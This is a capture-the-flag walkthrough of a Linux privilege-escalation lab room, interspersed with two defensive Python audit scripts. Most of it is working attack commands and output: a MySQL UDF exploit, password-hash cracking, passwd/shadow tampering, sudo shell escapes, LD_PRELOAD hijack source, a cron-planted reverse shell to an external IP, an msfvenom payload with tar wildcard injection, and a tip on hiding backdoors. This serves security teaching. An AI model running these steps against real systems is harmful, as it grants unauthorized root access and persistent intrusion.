This room explains some common methods of escalating privileges on Linux systems. This serves as a good place to start if you are stuck as a certain user and need to either upgrade or step laterally to another user.
Task 1 – Deploy the Vulnerable Debian VM
- Login credentials:
USER: user
PASS: password321
Run the 'id' command. What is the result?
Task 2 – Service Exploits
MySQL is running as "root" and the root user on MySQL does not have a password set. We can use a popular exploit that makes use of User Defined Functions (UDFs) to run system commands as root via the MySQL service.
- Change into the /home/user/tools/mysql-udf directory.
- Compile the raptor_udf2.c exploit using the following commands:
gcc -g -c raptor_udf2.c -fPIC
gcc -g -shared -Wl,-soname,raptor_udf2.so -o raptor_udf2.so raptor_udf2.o -lc
- Connect to the MySQL service as root, password is blank:
mysql -u root
- Execute the following commands on the MySQL shell to create a User Defined Function (UDF) "do_system" using our compiled exploit:
use mysql;
create table foo(line blob);
insert into foo values(load_file('/home/user/tools/mysql-udf/raptor_udf2.so'));
select * from foo into dumpfile '/usr/lib/mysql/plugin/raptor_udf2.so';
create function do_system returns integer soname 'raptor_udf2.so';
- Use the below command to copy /bin/bash to /tmp/rootbash and set the SUID permissions:
select do_system('cp /bin/bash /tmp/rootbash; chmod +xs /tmp/rootbash');
- Exit out of MySQL (type exit or \q and press Enter), then run the SUID bash copy /tmp/rootbash with the parameter -p to gain a shell running with root privileges:
/tmp/rootbash -p
The exploit!
user@debian:~$ cd /home/user/tools/mysql-udf
user@debian:~/tools/mysql-udf$ gcc -g -c raptor_udf2.c -fPIC
user@debian:~/tools/mysql-udf$ gcc -g -shared -Wl,-soname,raptor_udf2.so -o raptor_udf2.so raptor_udf2.o -lc
user@debian:~/tools/mysql-udf$ mysql -u root
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 35
Server version: 5.1.73-1+deb6u1 (Debian)
Copyright (c) 2000, 2013, Oracle and/or its affiliates. All rights reserved.
Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
mysql> use mysql;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
mysql> create table foo(line blob);
Query OK, 0 rows affected (0.27 sec)
mysql> insert into foo values(load_file('/home/user/tools/mysql-udf/raptor_udf2.so'));
Query OK, 1 row affected (0.00 sec)
mysql> select * from foo into dumpfile '/usr/lib/mysql/plugin/raptor_udf2.so';
Query OK, 1 row affected (0.00 sec)
mysql> create function do_system returns integer soname 'raptor_udf2.so';
Query OK, 0 rows affected (0.00 sec)
mysql> select do_system('cp /bin/bash /tmp/rootbash; chmod +xs /tmp/rootbash');
+------------------------------------------------------------------+
| do_system('cp /bin/bash /tmp/rootbash; chmod +xs /tmp/rootbash') |
+------------------------------------------------------------------+
| 0 |
+------------------------------------------------------------------+
1 row in set (0.01 sec)
mysql> \q
user@debian:~$ /tmp/rootbash -p
root@debian:/usr/share/man# id
uid=0(root) gid=0(root) groups=0(root)
Task 3 – Weak File Permissions – Readable /etc/shadow
An /etc/shadow file that is world-readable is dangerous… the /etc/shadow file is where Linux stores its users' password hashes. Just because the passwords are hashed doesn't mean that we cannot break them… especially if the user has chosen a simple password…
- The /etc/shadow file contains user password hashes and is usually readable only by root… note that on this VM it is world-readable:
user@debian:~/tools/mysql-udf$ ls -l /etc/shadow
-rw-r--rw- 1 root shadow 837 Aug 25 2019 /etc/shadow
- View the contents of the /etc/shadow file:
user@debian:~/tools/mysql-udf$ cat /etc/shadow
root:$6$Tb/euwmK$OXA.dwMeOAcopwBl68boTG5zi65wIHsc84OWAIye5VITLLtVlaXvRDJXET..it8r.jbrlpfZeMdwD3B0fGxJI0:17298:0:99999:7:::
daemon:*:17298:0:99999:7:::
bin:*:17298:0:99999:7:::
sys:*:17298:0:99999:7:::
sync:*:17298:0:99999:7:::
games:*:17298:0:99999:7:::
man:*:17298:0:99999:7:::
lp:*:17298:0:99999:7:::
mail:*:17298:0:99999:7:::
news:*:17298:0:99999:7:::
uucp:*:17298:0:99999:7:::
proxy:*:17298:0:99999:7:::
www-data:*:17298:0:99999:7:::
backup:*:17298:0:99999:7:::
list:*:17298:0:99999:7:::
irc:*:17298:0:99999:7:::
gnats:*:17298:0:99999:7:::
nobody:*:17298:0:99999:7:::
libuuid:!:17298:0:99999:7:::
Debian-exim:!:17298:0:99999:7:::
sshd:*:17298:0:99999:7:::
user:$6$M1tQjkeb$M1A/ArH4JeyF1zBJPLQ.TZQR1locUlz0wIZsoY6aDOZRFrYirKDW5IJy32FBGjwYpT2O1zrR2xTROv7wRIkF8.:17298:0:99999:7:::
statd:*:17299:0:99999:7:::
mysql:!:18133:0:99999:7:::
Each line represents a user. A user's password hash (if they have one) can be found between the first and second colons (:) of each line.
- Save the root user's hash to a file called hash.txt and use John The Ripper to crack it with rockyou.txt – the famous plaintext list of over 14 million commonly used passwords:
❯ john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt
Warning: detected hash type "sha512crypt", but the string is also recognized as "sha512crypt-opencl"
Use the "--format=sha512crypt-opencl" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 128/128 AVX 2x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
password123 (root)
1g 0:00:00:01 DONE (2021-11-24 16:57) 0.8547g/s 1312p/s 1312c/s 1312C/s cuties..mexico1
Use the "--show" option to display all of the cracked passwords reliably
Session completed
- Switch to the root user, using the cracked password:
user@debian:~/tools/mysql-udf$ su root
Password:
root@debian:/home/user/tools/mysql-udf#
What is the root user's password hash?
What hashing algorithm was used to produce the root user's password hash?
What is the root user's password?
Task 4 – Weak File Permissions – Writeable /etc/shadow
As dangerous as a world-readable /etc/shadow file is, a world-writeable /etc/shadow file is 100x worse… it allows ANYONE with access to modify ANY password stored in this file. In 3 easy steps we can overwrite the root user's password with whatever we want, and no one would be the wiser (until someone tries to access the root account with the old password, anyway…)
- The /etc/shadow file on this VM is world-writeable:
user@debian:~/tools/mysql-udf$ ls -l /etc/shadow
-rw-r--rw- 1 root shadow 837 Aug 25 2019 /etc/shadow
- Generate a new password hash with a password of your choice:
user@debian:~/tools/mysql-udf$ mkpasswd -m sha-512 pwn3d
$6$w1DLfTWkp2iep$P1rdUJ.aGUsX1v66DRwjMI.HKipURmgJ9rq7uQcKhRFZPzDtHgIU7yE09YbWPicDffVyW8AVx/y20xHvAnLxO0
- Edit the /etc/shadow file and replace the original root hash with the one generated above, then switch to root:
user@debian:~/tools/mysql-udf$ vi /etc/shadow
"/etc/shadow" 24L, 842C written
user@debian:~/tools/mysql-udf$ su root
Password:
root@debian:/home/user/tools/mysql-udf#
Task 5 – Weak File Permissions – Writeable /etc/passwd
The /etc/passwd file contains information about user accounts. It is world-readable by default, but is usually only writeable by root. Historically, the /etc/passwd file contained the users' password hashes, and some versions of Linux still allow password hashes to be stored there.
- Note that the /etc/passwd file is world-writeable:
user@debian:~/tools$ ls -l /etc/passwd
-rw-r--rw- 1 root root 1009 Aug 25 2019 /etc/passwd
- Generate a new password hash with a password of your choice:
user@debian:~/tools$ openssl passwd l33t
XlfiGiQKUvlVE
- Edit the /etc/passwd file and either replace the x between the first and second colon on the root account line, or better still copy the whole line to the bottom of the file, change root to something else and paste the generated password hash between the first and second colons:
stimpz:XlfiGiQKUvlVE:0:0:root:/root:/bin/bash
"/etc/passwd" 25L, 1055C written
user@debian:~/tools$ su stimpz
Password:
root@debian:/home/user/tools# id
uid=0(root) gid=0(root) groups=0(root)
Run the 'id' command as the new root user. What is the result?
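The three weaknesses above (a readable shadow file, a writeable shadow file, a writeable passwd file with an extra UID-0 line) can all be caught by looking at permission bits and at the second field of each record. The following is an added audit script for this writeup, not part of the TryHackMe room or its tools; every input it reads is constructed text modelled on the listings above (hash bodies replaced by placeholders), so it runs offline. The algorithm names are derived from the crypt(3) prefix, which is how John identified the root hash as sha512crypt.

```python
"""Audit the account databases that Tasks 3-5 abuse.

Added example for this writeup, not part of the TryHackMe room or its tools.
All input below is constructed text modelled on the room's listings (hash bodies
are placeholders), so the checks run offline and deterministically.
"""
import os

# Constructed `ls -l` lines: the weak modes seen in the room plus a sane control.
LS_LINES = [
    "-rw-r--rw- 1 root shadow 837 Aug 25 2019 /etc/shadow",
    "-rw-r--rw- 1 root root 1009 Aug 25 2019 /etc/passwd",
    "-rw-r----- 1 root shadow 837 Aug 25 2019 /etc/shadow",
]

# Constructed /etc/passwd, including the extra UID-0 line planted in Task 5.
PASSWD = """root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
user:x:1000:1000:user,,,:/home/user:/bin/bash
stimpz:XlfiGiQKUvlVE:0:0:root:/root:/bin/bash
"""

# Constructed /etc/shadow (hash bodies shortened to placeholders).
SHADOW = """root:$6$Tb/euwmK$PLACEHOLDER:17298:0:99999:7:::
daemon:*:17298:0:99999:7:::
user:$6$M1tQjkeb$PLACEHOLDER:17298:0:99999:7:::
mysql:!:18133:0:99999:7:::
"""

# crypt(3) prefix -> algorithm name; "$6$" is the sha512crypt John reported.
HASH_IDS = {"$1$": "md5crypt", "$5$": "sha256crypt", "$6$": "sha512crypt", "$y$": "yescrypt"}
LOCKED = {"*", "!", "!!", "!*"}


def mode_findings(ls_line):
    """Report dangerous 'other' permission bits from one `ls -l` line."""
    fields = ls_line.split()
    mode, path = fields[0], fields[-1]
    others = mode[7:10]  # rwx triple for everyone else
    findings = []
    if os.path.basename(path) == "shadow" and "r" in others:
        findings.append(f"{path}: readable by everyone (expect -rw-r----- root:shadow)")
    if "w" in others:
        findings.append(f"{path}: writable by everyone")
    return findings


def passwd_findings(passwd_text):
    """Flag inline hashes, empty password fields and extra UID-0 accounts."""
    findings = []
    for line in passwd_text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        name, pw_field, uid = line.split(":")[:3]
        if pw_field == "":
            findings.append(f"{name}: empty password field (no password needed)")
        elif pw_field not in {"x"} | LOCKED:
            findings.append(f"{name}: password hash stored in /etc/passwd, not /etc/shadow")
        if uid == "0" and name != "root":
            findings.append(f"{name}: UID 0 account that is not root")
    return findings


def shadow_algorithms(shadow_text):
    """Map each /etc/shadow user to the hashing scheme of its second field."""
    result = {}
    for line in shadow_text.splitlines():
        if not line.strip():
            continue
        name, hash_field = line.split(":")[:2]
        if hash_field in LOCKED:
            result[name] = "locked"
        elif hash_field == "":
            result[name] = "empty"
        else:
            result[name] = HASH_IDS.get(hash_field[:3], "unknown")
    return result


def audit():
    """Run every check over the constructed input and return all findings."""
    findings = []
    for line in LS_LINES:
        findings += mode_findings(line)
    findings += passwd_findings(PASSWD)
    weak = [u for u, alg in shadow_algorithms(SHADOW).items() if alg in ("md5crypt", "unknown")]
    findings += [f"{u}: weak or unrecognised hash scheme" for u in weak]
    return findings


if __name__ == "__main__":
    for finding in audit():
        print(finding)
```

On a real host the same functions take `ls -l /etc/shadow /etc/passwd` output and the files' contents; the fix for every finding here is the same: `chmod 640 /etc/shadow`, `chmod 644 /etc/passwd`, both owned by root, and no record other than root with UID 0.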
Task 6 – Sudo – Shell Escape Sequences
- List the programs which sudo allows your user to run:
user@debian:~/tools$ sudo -l
Matching Defaults entries for user on this host:
env_reset, env_keep+=LD_PRELOAD, env_keep+=LD_LIBRARY_PATH
User user may run the following commands on this host:
(root) NOPASSWD: /usr/sbin/iftop
(root) NOPASSWD: /usr/bin/find
(root) NOPASSWD: /usr/bin/nano
(root) NOPASSWD: /usr/bin/vim
(root) NOPASSWD: /usr/bin/man
(root) NOPASSWD: /usr/bin/awk
(root) NOPASSWD: /usr/bin/less
(root) NOPASSWD: /usr/bin/ftp
(root) NOPASSWD: /usr/bin/nmap
(root) NOPASSWD: /usr/sbin/apache2
(root) NOPASSWD: /bin/more
- Use GTFOBins and search for the program names. If a program is listed with "sudo" as a function, you can use it to elevate privileges, usually via an escape sequence.
For an extra challenge, try to gain a root shell using all the programs on the list!
iftop
user@debian:~$ sudo iftop
interface: eth0
IP address is: 10.10.127.35
MAC address is: 02:2c:1a:3c:85:ff
!/bin/bash
root@debian:/home/user# id
uid=0(root) gid=0(root) groups=0(root)
root@debian:/home/user#
find
user@debian:~$ sudo find . -exec /bin/bash \; -quit
root@debian:/home/user# id
uid=0(root) gid=0(root) groups=0(root)
nano
user@debian:~$ sudo nano
Ctrl-R / Ctrl-X
reset; bash 1>&0 2>&0
root@debian:/home/user# id
uid=0(root) gid=0(root) groups=0(root)
vim
user@debian:~$ sudo vim -c ':!/bin/bash'
root@debian:/home/user# id
uid=0(root) gid=0(root) groups=0(root)
man
user@debian:~$ sudo man man
!/bin/bash
root@debian:/usr/share/man# id
uid=0(root) gid=0(root) groups=0(root)
awk
user@debian:~$ sudo awk 'BEGIN {system("/bin/bash")}'
root@debian:/home/user# id
uid=0(root) gid=0(root) groups=0(root)
less
user@debian:~$ sudo less /etc/profile
!/bin/bash
root@debian:/home/user# id
uid=0(root) gid=0(root) groups=0(root)
ftp
user@debian:~$ sudo ftp
ftp> !/bin/bash
root@debian:/home/user# id
uid=0(root) gid=0(root) groups=0(root)
nmap
user@debian:~$ sudo nmap --interactive
Starting Nmap V. 5.00 ( http://nmap.org )
Welcome to Interactive Mode -- press h <enter> for help
nmap> !/bin/bash
root@debian:/home/user# id
uid=0(root) gid=0(root) groups=0(root)
/bin/more
user@debian:~$ TERM= sudo more /etc/profile
!/bin/bash
root@debian:/home/user# id
uid=0(root) gid=0(root) groups=0(root)
NOTE: the apache2 sudo method is covered in the topic below; it's not your usual standard shell-escape GTFOBins-style exploit.
How many programs is 'user' allowed to run via sudo?
One program on the list doesn't have a shell escape sequence on GTFOBins. Which is it?
Task 7 – Sudo – Environment Variables
Sudo can be configured to inherit certain environment variables from the user’s environment.
- Check which environment variables are inherited (look for the env_keep options):
user@debian:~$ sudo -l
Matching Defaults entries for user on this host:
env_reset, env_keep+=LD_PRELOAD, env_keep+=LD_LIBRARY_PATH
User user may run the following commands on this host:
(root) NOPASSWD: /usr/sbin/iftop
(root) NOPASSWD: /usr/bin/find
(root) NOPASSWD: /usr/bin/nano
(root) NOPASSWD: /usr/bin/vim
(root) NOPASSWD: /usr/bin/man
(root) NOPASSWD: /usr/bin/awk
(root) NOPASSWD: /usr/bin/less
(root) NOPASSWD: /usr/bin/ftp
(root) NOPASSWD: /usr/bin/nmap
(root) NOPASSWD: /usr/sbin/apache2
(root) NOPASSWD: /bin/more
LD_PRELOAD and LD_LIBRARY_PATH are both inherited from the user's environment. LD_PRELOAD loads a shared object before any others when a program is run. LD_LIBRARY_PATH provides a list of directories where shared libraries are searched for first.
- Create a shared object using the code located at /home/user/tools/sudo/preload.c:
user@debian:~$ gcc -fPIC -shared -nostartfiles -o /tmp/preload.so /home/user/tools/sudo/preload.c
user@debian:~$
- Run one of the programs you are allowed to run via sudo, while setting the LD_PRELOAD environment variable to the full path of the new shared object:
user@debian:~$ sudo LD_PRELOAD=/tmp/preload.so apache2
root@debian:/home/user# id
uid=0(root) gid=0(root) groups=0(root)
- Run ldd /usr/sbin/apache2:
user@debian:~$ ldd /usr/sbin/apache2
linux-vdso.so.1 => (0x00007fffe3bb4000)
libpcre.so.3 => /lib/x86_64-linux-gnu/libpcre.so.3 (0x00007fd7c7843000)
libaprutil-1.so.0 => /usr/lib/libaprutil-1.so.0 (0x00007fd7c761f000)
libapr-1.so.0 => /usr/lib/libapr-1.so.0 (0x00007fd7c73e5000)
libpthread.so.0 => /lib/libpthread.so.0 (0x00007fd7c71c9000)
libc.so.6 => /lib/libc.so.6 (0x00007fd7c6e5d000)
libuuid.so.1 => /lib/libuuid.so.1 (0x00007fd7c6c58000)
librt.so.1 => /lib/librt.so.1 (0x00007fd7c6a50000)
libcrypt.so.1 => /lib/libcrypt.so.1 (0x00007fd7c6819000)
libdl.so.2 => /lib/libdl.so.2 (0x00007fd7c6614000)
libexpat.so.1 => /usr/lib/libexpat.so.1 (0x00007fd7c63ec000)
/lib64/ld-linux-x86-64.so.2 (0x00007fd7c7d00000)
- Create a shared object with the same name as one of the listed libraries (libcrypt.so.1) using the code located at /home/user/tools/sudo/library_path.c:
user@debian:~$ gcc -o /tmp/libcrypt.so.1 -shared -fPIC /home/user/tools/sudo/library_path.c
user@debian:~$
- Run apache2 using sudo, while setting the LD_LIBRARY_PATH environment variable to /tmp (where we output the compiled shared object):
user@debian:~$ sudo LD_LIBRARY_PATH=/tmp apache2
apache2: /tmp/libcrypt.so.1: no version information available (required by /usr/lib/libaprutil-1.so.0)
root@debian:/home/user# id
uid=0(root) gid=0(root) groups=0(root)
A root shell should spawn.
- Try renaming /tmp/libcrypt.so.1 to the name of another library used by apache2 and re-run apache2 using sudo again. Did it work? If not, try to figure out why not, and how the library_path.c code could be changed to make it work.
user@debian:~/tools/sudo$ mv /tmp/libcrypt.so.1 /tmp/libpcre.so.3
user@debian:~/tools/sudo$ sudo LD_LIBRARY_PATH=/tmp apache2
apache2: symbol lookup error: apache2: undefined symbol: pcre_free
user@debian:~/tools/sudo$ mv /tmp/libpcre.so.3 /tmp/libuuid.so.1
user@debian:~/tools/sudo$ sudo LD_LIBRARY_PATH=/tmp apache2
apache2: /tmp/libuuid.so.1: no version information available (required by /usr/lib/libapr-1.so.0)
root@debian:/home/user/tools/sudo# id
uid=0(root) gid=0(root) groups=0(root)
SOURCE >> library_path.c
#define _GNU_SOURCE   /* setresuid() is a GNU extension in the glibc headers */
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>   /* setresuid() */
/* The constructor runs as soon as the loader maps this library, before main(). */
static void hijack() __attribute__((constructor));
void hijack() {
unsetenv("LD_LIBRARY_PATH");   /* don't carry the hijack into child processes */
setresuid(0,0,0);              /* real/effective/saved uid -> root (euid is already 0 under sudo) */
system("/bin/bash -p");
}
SOURCE >> preload.c
#define _GNU_SOURCE   /* setresuid() is a GNU extension in the glibc headers */
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
#include <unistd.h>   /* setresuid() */
/* Built with -nostartfiles, so _init() is the entry point the loader calls on load. */
void _init() {
unsetenv("LD_PRELOAD");   /* stop the preload propagating to the spawned shell */
setresuid(0,0,0);
system("/bin/bash -p");
}
Task 8 – Cron Jobs – File Permissions
Cron jobs are programs or scripts which users can schedule to run at specific times or intervals. Cron table files (crontabs) store the configuration for cron jobs. The system-wide crontab is located at /etc/crontab.
- View the contents of the system-wide crontab:
user@debian:~$ cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.
SHELL=/bin/sh
PATH=/home/user:/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user command
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#
* * * * * root overwrite.sh
* * * * * root /usr/local/bin/compress.sh
There should be two cron jobs scheduled to run every minute. One runs overwrite.sh, the other runs /usr/local/bin/compress.sh.
- Locate the full path of the overwrite.sh file:
user@debian:~$ locate overwrite.sh
/usr/local/bin/overwrite.sh
- Note that the file is world-writeable:
user@debian:~$ ls -l /usr/local/bin/overwrite.sh
-rwxr--rw- 1 root staff 40 May 13 2017 /usr/local/bin/overwrite.sh
- Replace the contents of the overwrite.sh file with the following (change the IP to your VPN IP and the port to match), and open a netcat listener on your attack box using the port given below:
user@debian:/usr/local/bin$ echo '#!/bin/bash' > overwrite.sh
user@debian:/usr/local/bin$ echo 'bash -i >& /dev/tcp/10.9.2.201/1337 0>&1' >> overwrite.sh
user@debian:/usr/local/bin$ cat overwrite.sh
#!/bin/bash
bash -i >& /dev/tcp/10.9.2.201/1337 0>&1
user@debian:/usr/local/bin$
❯ nc -lnvp 1337
Connection from 10.10.200.127:34634
bash: no job control in this shell
root@debian:~# id
id
uid=0(root) gid=0(root) groups=0(root)
NOTE: Skipping that first echo command will leave the original code in the file instead of clearing it out… this would make it "less obvious" something has been backdoored, and is the preferred method of sneaking in a backdoor in real-life circumstances. This matters especially when using the above command to spawn a shell, as it will stop the script from running any further until that shell dies. This task, however, explicitly says to "Replace the contents", so in that circumstance you must include that first echo to overwrite the contents of the file.
Task 9 – Cron Jobs – PATH Environment Variable
- View the contents of the system-wide crontab /etc/crontab:
user@debian:/usr/local/bin$ cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.
SHELL=/bin/sh
PATH=/home/user:/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user command
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#
* * * * * root overwrite.sh
* * * * * root /usr/local/bin/compress.sh
- Notice the PATH includes the directory /home/user at the front? Because the line calling overwrite.sh does not have a path, we can create our own malicious overwrite.sh and drop it in our home folder (which comes before the full path of overwrite.sh, /usr/local/bin, hence it will run our script first)!
user@debian:~$ echo '#!/bin/bash' > ~/overwrite.sh
user@debian:~$ echo 'cp /bin/bash /tmp/rootbash' >> ~/overwrite.sh
user@debian:~$ echo 'chmod +xs /tmp/rootbash' >> ~/overwrite.sh
user@debian:~$ cat overwrite.sh
#!/bin/bash
cp /bin/bash /tmp/rootbash
chmod +xs /tmp/rootbash
user@debian:~$ chmod +x overwrite.sh
user@debian:~$ ls /tmp/rootbash
ls: cannot access /tmp/rootbash: No such file or directory
...
user@debian:~$ ls -l /tmp/rootbash
-rwsr-sr-x 1 root root 926536 Nov 24 03:20 /tmp/rootbash
- Now to get a root shell, simply run /tmp/rootbash -p:
user@debian:~$ /tmp/rootbash -p
rootbash-4.1# id
uid=1000(user) gid=1000(user) euid=0(root) egid=0(root) groups=0(root),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),1000(user)
What is the value of the PATH variable in /etc/crontab?
Task 10 – Cron Jobs – Wildcards
- Let's look at the other cron job script, compress.sh:
user@debian:~$ cat /usr/local/bin/compress.sh
#!/bin/sh
cd /home/user
tar czf /tmp/backup.tar.gz *
Notice the * (wildcard) at the end of the tar command?
Let's take a look at the GTFOBins page for tar: https://gtfobins.github.io/gtfobins/tar/
Tar has command line options that let you run other commands as part of a "checkpoint" feature.
- Let's cook up a shell in msfvenom, then run nc to listen on the port we set:
❯ msfvenom -p linux/x64/shell_reverse_tcp LHOST=tun0 LPORT=1337 -f elf -o linl33t
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 74 bytes
Final size of elf file: 194 bytes
Saved as: linl33t
❯ nc -lnvp 1337
- Transfer it to /home/user ("user"'s home directory) via scp:
❯ scp -oHostKeyAlgorithms=+ssh-rsa linl33t user@10.10.200.127:~
user@10.10.200.127's password:
linl33t 100% 194 0.6KB/s 00:00
- On the target box, don't forget to make it executable:
user@debian:~$ chmod +x linl33t
user@debian:~$
- Now we will create two files in /home/user whose names match the command-line switches tar expects, so that it runs linl33t (our msfvenom reverse shell):
touch /home/user/--checkpoint=1
touch /home/user/--checkpoint-action=exec=linl33t
- … and magically, back on our attack box:
❯ nc -lnvp 1337
Connection from 10.10.200.127:34644
id
uid=0(root) gid=0(root) groups=0(root)
uname -a
Linux debian 2.6.32-5-amd64 #1 SMP Tue May 13 16:34:35 UTC 2014 x86_64 GNU/Linux
hostname
debian
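Tasks 8, 9 and 10 are three faces of the same crontab: a root job whose script others can write, a relative command name resolved through a PATH that starts with a user's home directory, and a script that hands tar a shell glob. The auditor below is an added example for this writeup, not part of the room; the crontab text and the tiny "filesystem" dict are constructed to mirror the listings above, and the set of unprivileged-writable directories stands in for a real ownership check.

```python
"""Audit a system crontab for the three cron weaknesses in Tasks 8-10:
world-writable scripts, relative command names resolved through a PATH
that includes an unprivileged user's directory, and tar run on a shell glob.

Added example for this writeup, not part of the room. The crontab and the
"filesystem" below are constructed to mirror the room; the set of writable
directories stands in for a real stat()-based check.
"""
import shlex

CRONTAB = """SHELL=/bin/sh
PATH=/home/user:/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user command
17 * * * * root cd / && run-parts --report /etc/cron.hourly
* * * * * root overwrite.sh
* * * * * root /usr/local/bin/compress.sh
"""

# Constructed files: path -> (ls-style mode, contents).
FILES = {
    "/usr/local/bin/overwrite.sh": ("-rwxr--rw-", "#!/bin/bash\necho 'backup done' > /tmp/status\n"),
    "/usr/local/bin/compress.sh": ("-rwxr-xr-x", "#!/bin/sh\ncd /home/user\ntar czf /tmp/backup.tar.gz *\n"),
}
UNPRIVILEGED_WRITABLE = {"/home/user", "/tmp"}
SHELL_BUILTINS = {"cd", "test", "[", "exec", "set", "export"}


def parse_crontab(text):
    """Return (PATH entries, jobs) from system-crontab text (user field present)."""
    path, jobs = [], []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if "=" in line.split()[0]:          # VAR=value assignment
            key, _, value = line.partition("=")
            if key.strip() == "PATH":
                path = value.strip().split(":")
            continue
        fields = line.split(None, 6)        # m h dom mon dow user command
        if len(fields) == 7:
            jobs.append({"user": fields[5], "command": fields[6]})
    return path, jobs


def resolve(cmd, path, files):
    """First PATH directory holding cmd wins, exactly as sh would resolve it."""
    if "/" in cmd:
        return cmd
    for d in path:
        if f"{d}/{cmd}" in files:
            return f"{d}/{cmd}"
    return None


def script_findings(path_name, content):
    """Scan a script body for tar fed an unquoted shell glob."""
    findings = []
    for line in content.splitlines():
        try:
            tokens = shlex.split(line, comments=True)
        except ValueError:
            continue
        if "tar" in tokens and "*" in tokens:
            findings.append(f"{path_name}: tar given a shell glob; a file named "
                            "--checkpoint-action=... becomes an option (use: tar czf out -C dir .)")
    return findings


def audit_crontab(text=CRONTAB, files=FILES, writable=UNPRIVILEGED_WRITABLE):
    findings = []
    path, jobs = parse_crontab(text)
    for d in path:
        if d in writable or not d.startswith("/"):
            findings.append(f"PATH entry {d} is writable by an unprivileged user")
    for job in jobs:
        first = shlex.split(job["command"])[0]
        if first in SHELL_BUILTINS:
            continue
        if "/" not in first and job["user"] == "root":
            findings.append(f"job '{first}' runs as root but is resolved through PATH")
        target = resolve(first, path, files)
        if target is None or target not in files:
            continue
        mode, content = files[target]
        if mode[5] == "w" or mode[8] == "w":
            findings.append(f"{target}: script run by {job['user']} is group/world-writable")
        findings += script_findings(target, content)
    return findings


if __name__ == "__main__":
    for finding in audit_crontab():
        print(finding)
```

The resolve() helper makes the Task 9 point concrete: a file at /home/user/overwrite.sh would be returned before /usr/local/bin/overwrite.sh purely because of PATH order. The fixes are the usual ones: absolute paths in every job, a PATH of root-owned directories only, 0755 root-owned scripts, and archiving a directory (`-C dir .`) rather than a glob.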
Task 11 – SUID / SGID Executables – Known Exploits
- Find all SUID / SGID executables:
user@debian:~$ find / -type f -a \( -perm -u+s -o -perm -g+s \) -exec ls -l {} \; 2> /dev/null
-rwxr-sr-x 1 root shadow 19528 Feb 15 2011 /usr/bin/expiry
-rwxr-sr-x 1 root ssh 108600 Apr 2 2014 /usr/bin/ssh-agent
-rwsr-xr-x 1 root root 37552 Feb 15 2011 /usr/bin/chsh
-rwsr-xr-x 2 root root 168136 Jan 5 2016 /usr/bin/sudo
-rwxr-sr-x 1 root tty 11000 Jun 17 2010 /usr/bin/bsd-write
-rwxr-sr-x 1 root crontab 35040 Dec 18 2010 /usr/bin/crontab
-rwsr-xr-x 1 root root 32808 Feb 15 2011 /usr/bin/newgrp
-rwsr-xr-x 2 root root 168136 Jan 5 2016 /usr/bin/sudoedit
-rwxr-sr-x 1 root shadow 56976 Feb 15 2011 /usr/bin/chage
-rwsr-xr-x 1 root root 43280 Feb 15 2011 /usr/bin/passwd
-rwsr-xr-x 1 root root 60208 Feb 15 2011 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 39856 Feb 15 2011 /usr/bin/chfn
-rwxr-sr-x 1 root tty 12000 Jan 25 2011 /usr/bin/wall
-rwsr-sr-x 1 root staff 9861 May 14 2017 /usr/local/bin/suid-so
-rwsr-sr-x 1 root staff 6883 May 14 2017 /usr/local/bin/suid-env
-rwsr-sr-x 1 root staff 6899 May 14 2017 /usr/local/bin/suid-env2
-rwsr-xr-x 1 root root 963691 May 13 2017 /usr/sbin/exim-4.84-3
-rwsr-xr-x 1 root root 6776 Dec 19 2010 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-x 1 root root 212128 Apr 2 2014 /usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root root 10592 Feb 15 2016 /usr/lib/pt_chown
-rwsr-xr-x 1 root root 36640 Oct 14 2010 /bin/ping6
-rwsr-xr-x 1 root root 34248 Oct 14 2010 /bin/ping
-rwsr-xr-x 1 root root 78616 Jan 25 2011 /bin/mount
-rwsr-xr-x 1 root root 34024 Feb 15 2011 /bin/su
-rwsr-xr-x 1 root root 53648 Jan 25 2011 /bin/umount
-rwsr-sr-x 1 root root 926536 Nov 24 03:55 /tmp/rootbash
-rwxr-sr-x 1 root shadow 31864 Oct 17 2011 /sbin/unix_chkpwd
